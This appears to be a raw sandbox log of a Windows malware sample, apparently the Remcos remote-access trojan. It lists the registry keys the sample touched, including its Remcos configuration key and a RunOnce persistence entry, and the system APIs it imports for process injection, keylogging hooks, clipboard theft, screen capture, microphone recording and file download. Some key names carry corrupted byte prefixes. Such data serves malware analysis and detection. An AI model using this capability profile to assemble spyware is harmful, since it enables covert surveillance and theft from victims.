HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Environment\windir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\9
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
\xe3\xa9\xa0\xc3\x8cEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
\xe3\xa9\xa0\xc3\x8cEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SourcePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\DevicePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IEInstal.exe\DisableUserModeCallbackFilter
\xef\xb0\xa8\xc9\x96EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\override
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\iz3Eh
HKEY_CURRENT_USER\Environment\windir
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\exepath
HKEY_CURRENT_USER\Software\Remcos-GMZ5DV\licence
HKEY_CURRENT_USER\Environment\windir
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernelbase.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.ProcessIdToSessionId
imm32.dll.ImmCreateContext
imm32.dll.ImmDestroyContext
imm32.dll.ImmNotifyIME
imm32.dll.ImmAssociateContext
imm32.dll.ImmReleaseContext
imm32.dll.ImmGetContext
imm32.dll.ImmGetCompositionStringA
imm32.dll.ImmSetCompositionStringA
imm32.dll.ImmGetCompositionStringW
imm32.dll.ImmSetCompositionStringW
imm32.dll.ImmSetCandidateWindow
kernel32.dll.GetDiskFreeSpaceExA
oleaut32.dll.VariantChangeTypeEx
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarAdd
oleaut32.dll.VarSub
oleaut32.dll.VarMul
oleaut32.dll.VarDiv
oleaut32.dll.VarIdiv
oleaut32.dll.VarMod
oleaut32.dll.VarAnd
oleaut32.dll.VarOr
oleaut32.dll.VarXor
oleaut32.dll.VarCmp
oleaut32.dll.VarI4FromStr
oleaut32.dll.VarR4FromStr
oleaut32.dll.VarR8FromStr
oleaut32.dll.VarDateFromStr
oleaut32.dll.VarCyFromStr
oleaut32.dll.VarBoolFromStr
oleaut32.dll.VarBstrFromCy
oleaut32.dll.VarBstrFromDate
oleaut32.dll.VarBstrFromBool
user32.dll.GetMonitorInfoA
user32.dll.GetSystemMetrics
user32.dll.EnumDisplayMonitors
user32.dll.AnimateWindow
comctl32.dll.InitializeFlatSB
comctl32.dll.UninitializeFlatSB
comctl32.dll.FlatSB_GetScrollProp
comctl32.dll.FlatSB_SetScrollProp
comctl32.dll.FlatSB_EnableScrollBar
comctl32.dll.FlatSB_ShowScrollBar
comctl32.dll.FlatSB_GetScrollRange
comctl32.dll.FlatSB_GetScrollInfo
comctl32.dll.FlatSB_GetScrollPos
comctl32.dll.FlatSB_SetScrollPos
comctl32.dll.FlatSB_SetScrollInfo
comctl32.dll.FlatSB_SetScrollRange
user32.dll.SetLayeredWindowAttributes
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.DeleteCriticalSection
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.InitializeCriticalSection
kernel32.dll.VirtualFree
kernel32.dll.VirtualAlloc
kernel32.dll.LocalFree
kernel32.dll.LocalAlloc
kernel32.dll.GetVersion
kernel32.dll.GetCurrentThreadId
kernel32.dll.InterlockedDecrement
kernel32.dll.InterlockedIncrement
kernel32.dll.VirtualQuery
kernel32.dll.WideCharToMultiByte
kernel32.dll.MultiByteToWideChar
kernel32.dll.lstrlenA
kernel32.dll.lstrcpynA
kernel32.dll.LoadLibraryExA
kernel32.dll.GetThreadLocale
kernel32.dll.GetStartupInfoA
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
kernel32.dll.GetModuleFileNameA
kernel32.dll.GetLocaleInfoA
kernel32.dll.GetLastError
kernel32.dll.GetCommandLineA
kernel32.dll.FreeLibrary
kernel32.dll.FindFirstFileA
kernel32.dll.FindClose
kernel32.dll.ExitProcess
kernel32.dll.WriteFile
kernel32.dll.UnhandledExceptionFilter
kernel32.dll.SetFilePointer
kernel32.dll.SetEndOfFile
kernel32.dll.RtlUnwind
kernel32.dll.ReadFile
kernel32.dll.RaiseException
kernel32.dll.GetStdHandle
kernel32.dll.GetFileSize
kernel32.dll.GetFileType
kernel32.dll.CreateFileA
kernel32.dll.CloseHandle
user32.dll.GetKeyboardType
user32.dll.LoadStringA
user32.dll.MessageBoxA
user32.dll.CharNextA
advapi32.dll.RegQueryValueExA
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegCloseKey
oleaut32.dll.SysFreeString
oleaut32.dll.SysReAllocStringLen
oleaut32.dll.SysAllocStringLen
kernel32.dll.TlsSetValue
kernel32.dll.TlsGetValue
kernel32.dll.TlsFree
kernel32.dll.TlsAlloc
advapi32.dll.RegSetValueExA
advapi32.dll.RegFlushKey
advapi32.dll.RegCreateKeyExA
kernel32.dll.lstrcmpiA
kernel32.dll.WriteProcessMemory
kernel32.dll.WaitForSingleObject
kernel32.dll.VirtualProtect
kernel32.dll.VirtualAllocEx
kernel32.dll.Sleep
kernel32.dll.SizeofResource
kernel32.dll.SetEvent
kernel32.dll.ResetEvent
kernel32.dll.ReadProcessMemory
kernel32.dll.LockResource
kernel32.dll.LoadResource
kernel32.dll.LoadLibraryA
kernel32.dll.GetVersionExA
kernel32.dll.GetStringTypeExA
kernel32.dll.GetLocalTime
kernel32.dll.GetFullPathNameA
kernel32.dll.GetFileAttributesA
kernel32.dll.GetExitCodeThread
kernel32.dll.GetDiskFreeSpaceA
kernel32.dll.GetDateFormatA
kernel32.dll.GetCPInfo
kernel32.dll.GetACP
kernel32.dll.FormatMessageA
kernel32.dll.FindResourceA
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.FileTimeToDosDateTime
kernel32.dll.EnumCalendarInfoA
kernel32.dll.DeleteFileA
kernel32.dll.CreateRemoteThread
kernel32.dll.CreateProcessA
kernel32.dll.CreateEventA
kernel32.dll.CreateDirectoryA
kernel32.dll.CopyFileA
kernel32.dll.CompareStringA
user32.dll.CharToOemA
oleaut32.dll.SafeArrayPtrOfIndex
oleaut32.dll.SafeArrayGetUBound
oleaut32.dll.SafeArrayGetLBound
oleaut32.dll.SafeArrayCreate
oleaut32.dll.VariantChangeType
oleaut32.dll.VariantCopy
oleaut32.dll.VariantClear
oleaut32.dll.VariantInit
shell32.dll.ShellExecuteA
urlmon.dll.URLDownloadToFileA
kernel32.dll.ExitThread
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
cryptbase.dll.SystemFunction036
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
sspicli.dll.GetUserNameExW
ole32.dll.CoCreateInstance
secur32.dll.InitSecurityInterfaceW
cryptsp.dll.SystemFunction035
shell32.dll.ShellExecuteExW
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
duser.dll.InvalidateGadget
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
kernel32.dll.RegQueryValueExW
kernel32.dll.IsBadReadPtr
kernel32.dll.CreateMutexA
kernel32.dll.OpenMutexA
kernel32.dll.Process32NextW
kernel32.dll.Process32FirstW
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.OpenProcess
kernel32.dll.GetCurrentProcessId
kernel32.dll.lstrcatW
kernel32.dll.GetTempFileNameW
kernel32.dll.GetTempPathW
kernel32.dll.GetTickCount
kernel32.dll.GlobalUnlock
kernel32.dll.GlobalLock
kernel32.dll.GlobalAlloc
kernel32.dll.CopyFileW
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.GetThreadContext
kernel32.dll.CreateProcessW
kernel32.dll.GlobalFree
kernel32.dll.DuplicateHandle
kernel32.dll.GetCurrentThread
kernel32.dll.GetLongPathNameW
kernel32.dll.AllocConsole
kernel32.dll.ExpandEnvironmentStringsA
kernel32.dll.FindNextFileA
kernel32.dll.CreateFileMappingA
kernel32.dll.MapViewOfFileEx
kernel32.dll.RemoveDirectoryW
kernel32.dll.SetFileAttributesW
kernel32.dll.TerminateThread
kernel32.dll.GetLogicalDriveStringsA
kernel32.dll.GetFileAttributesW
kernel32.dll.DeleteFileW
kernel32.dll.GetDriveTypeA
kernel32.dll.FindFirstFileW
kernel32.dll.FindNextFileW
kernel32.dll.CreatePipe
kernel32.dll.PeekNamedPipe
kernel32.dll.TerminateProcess
kernel32.dll.HeapCreate
kernel32.dll.HeapFree
kernel32.dll.CreateThread
kernel32.dll.GetModuleFileNameW
kernel32.dll.CreateDirectoryW
kernel32.dll.CreateFileW
kernel32.dll.GetCurrentProcess
user32.dll.AppendMenuA
user32.dll.RegisterClassExA
user32.dll.CreateWindowExA
user32.dll.SystemParametersInfoW
user32.dll.SendInput
user32.dll.mouse_event
user32.dll.GetIconInfo
user32.dll.DrawIcon
user32.dll.EnumWindows
user32.dll.GetWindowTextW
user32.dll.IsWindowVisible
user32.dll.CloseWindow
user32.dll.GetWindowThreadProcessId
user32.dll.GetKeyboardLayoutNameA
user32.dll.MessageBoxW
user32.dll.ExitWindowsEx
user32.dll.EmptyClipboard
user32.dll.CreatePopupMenu
user32.dll.ShowWindow
user32.dll.SetWindowTextW
user32.dll.SetForegroundWindow
user32.dll.OpenClipboard
user32.dll.GetClipboardData
user32.dll.CloseClipboard
user32.dll.UnhookWindowsHookEx
user32.dll.GetForegroundWindow
user32.dll.GetWindowTextLengthA
user32.dll.GetWindowTextA
user32.dll.GetKeyState
user32.dll.CallNextHookEx
user32.dll.SetWindowsHookExA
user32.dll.GetKeyboardLayout
user32.dll.GetMessageA
user32.dll.TranslateMessage
user32.dll.TrackPopupMenu
user32.dll.GetCursorPos
user32.dll.SetClipboardData
user32.dll.DefWindowProcA
user32.dll.DispatchMessageA
gdi32.dll.CreateDCA
gdi32.dll.CreateCompatibleDC
gdi32.dll.GetDeviceCaps
gdi32.dll.CreateCompatibleBitmap
gdi32.dll.DeleteDC
gdi32.dll.DeleteObject
gdi32.dll.SelectObject
gdi32.dll.GetDIBits
gdi32.dll.GetObjectA
gdi32.dll.StretchBlt
advapi32.dll.RegDeleteKeyA
advapi32.dll.RegEnumKeyExA
advapi32.dll.GetUserNameW
advapi32.dll.ChangeServiceConfigW
advapi32.dll.QueryServiceStatus
advapi32.dll.ControlService
advapi32.dll.OpenSCManagerW
advapi32.dll.StartServiceW
advapi32.dll.OpenSCManagerA
advapi32.dll.EnumServicesStatusW
advapi32.dll.OpenServiceW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegCreateKeyA
advapi32.dll.RegSetValueExW
advapi32.dll.RegCreateKeyW
advapi32.dll.RegDeleteValueW
advapi32.dll.RegEnumValueW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegCreateKeyExW
advapi32.dll.AdjustTokenPrivileges
advapi32.dll.LookupPrivilegeValueA
advapi32.dll.OpenProcessToken
advapi32.dll.CloseServiceHandle
advapi32.dll.QueryServiceConfigW
shell32.dll.ExtractIconA
shell32.dll.Shell_NotifyIconA
shell32.dll.ShellExecuteExA
shell32.dll.ShellExecuteW
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.__p__fmode
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll.??1type_info@@UAE@XZ
msvcrt.dll._onexit
msvcrt.dll.__dllonexit
msvcrt.dll._iob
msvcrt.dll.freopen
msvcrt.dll.wcscat
msvcrt.dll._itow
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll._wsystem
msvcrt.dll.wcscpy
msvcrt.dll.wcslen
msvcrt.dll._wgetenv
msvcrt.dll.toupper
msvcrt.dll.sprintf
msvcrt.dll.tolower
msvcrt.dll.wcscmp
msvcrt.dll._wrename
msvcrt.dll.exit
msvcrt.dll.getenv
msvcrt.dll.printf
msvcrt.dll.strncmp
msvcrt.dll.malloc
msvcrt.dll.free
msvcrt.dll._EH_prolog
msvcrt.dll.__CxxFrameHandler
msvcrt.dll.??3@YAXPAX@Z
msvcrt.dll._CxxThrowException
msvcrt.dll.??0exception@@QAE@ABV0@@Z
msvcrt.dll.time
msvcrt.dll.localtime
msvcrt.dll.strftime
msvcrt.dll.atoi
msvcrt.dll._ftol
msvcrt.dll.??2@YAPAXI@Z
msvcrt.dll.swprintf
msvcrt.dll._itoa
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z
msvcp60.dll.?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z
msvcp60.dll.??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z
msvcp60.dll.??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z
msvcp60.dll.??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z
msvcp60.dll.??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z
msvcp60.dll.?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ
msvcp60.dll.??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
msvcp60.dll.?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
msvcp60.dll.??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z
msvcp60.dll.??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z
msvcp60.dll.??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z
msvcp60.dll.?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z
msvcp60.dll.?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z
msvcp60.dll.?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z
msvcp60.dll.??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z
msvcp60.dll.?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z
msvcp60.dll.?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
msvcp60.dll.??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z
msvcp60.dll.?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ
msvcp60.dll.??0Init@ios_base@std@@QAE@XZ
msvcp60.dll.??1Init@ios_base@std@@QAE@XZ
msvcp60.dll.??0_Winit@std@@QAE@XZ
msvcp60.dll.??1_Winit@std@@QAE@XZ
msvcp60.dll.?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
msvcp60.dll.?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
msvcp60.dll.??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z
msvcp60.dll.?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
msvcp60.dll.?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z
msvcp60.dll.?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
msvcp60.dll.?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
msvcp60.dll.?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ
msvcp60.dll.?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z
msvcp60.dll.?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z
msvcp60.dll.?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z
msvcp60.dll.??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z
msvcp60.dll.?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ
msvcp60.dll.?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
msvcp60.dll.?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
msvcp60.dll.?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z
msvcp60.dll.?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ
msvcp60.dll.?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z
msvcp60.dll.?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z
msvcp60.dll.??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z
msvcp60.dll.?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB
msvcp60.dll.?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
msvcp60.dll.?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z
msvcp60.dll.?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
msvcp60.dll.??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z
msvcp60.dll.??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
msvcp60.dll.??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
msvcp60.dll.??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z
msvcp60.dll.??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z
msvcp60.dll.?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ
msvcp60.dll.??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
msvcp60.dll.?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
msvcp60.dll.??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
msvcp60.dll.?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
msvcp60.dll.?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z
msvcp60.dll.?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z
msvcp60.dll.?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
msvcp60.dll.??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z
msvcp60.dll.??1out_of_range@std@@UAE@XZ
msvcp60.dll.??0out_of_range@std@@QAE@ABV01@@Z
msvcp60.dll.??0logic_error@std@@QAE@ABV01@@Z
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z
msvcp60.dll.??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z
msvcp60.dll.?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z
msvcp60.dll.??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
msvcp60.dll.?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z
msvcp60.dll.?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
msvcp60.dll.??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z
msvcp60.dll.??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z
shlwapi.dll.PathFileExistsW
shlwapi.dll.PathFileExistsA
shlwapi.dll.StrToIntA
winmm.dll.PlaySoundW
winmm.dll.mciSendStringA
winmm.dll.waveInStop
winmm.dll.waveInOpen
winmm.dll.waveInClose
winmm.dll.waveInUnprepareHeader
winmm.dll.waveInPrepareHeader
winmm.dll.mciSendStringW
winmm.dll.waveInAddBuffer
winmm.dll.waveInStart
ws2_32.dll.#9
ws2_32.dll.#52
ws2_32.dll.#3
ws2_32.dll.#12
ws2_32.dll.#23
ws2_32.dll.#4
ws2_32.dll.#16
ws2_32.dll.#19
ws2_32.dll.#115
urlmon.dll.URLDownloadToFileW
urlmon.dll.URLOpenBlockingStreamW
gdiplus.dll.GdipLoadImageFromStreamICM
gdiplus.dll.GdipLoadImageFromStream
gdiplus.dll.GdipDisposeImage
gdiplus.dll.GdipCloneImage
gdiplus.dll.GdipAlloc
gdiplus.dll.GdipSaveImageToStream
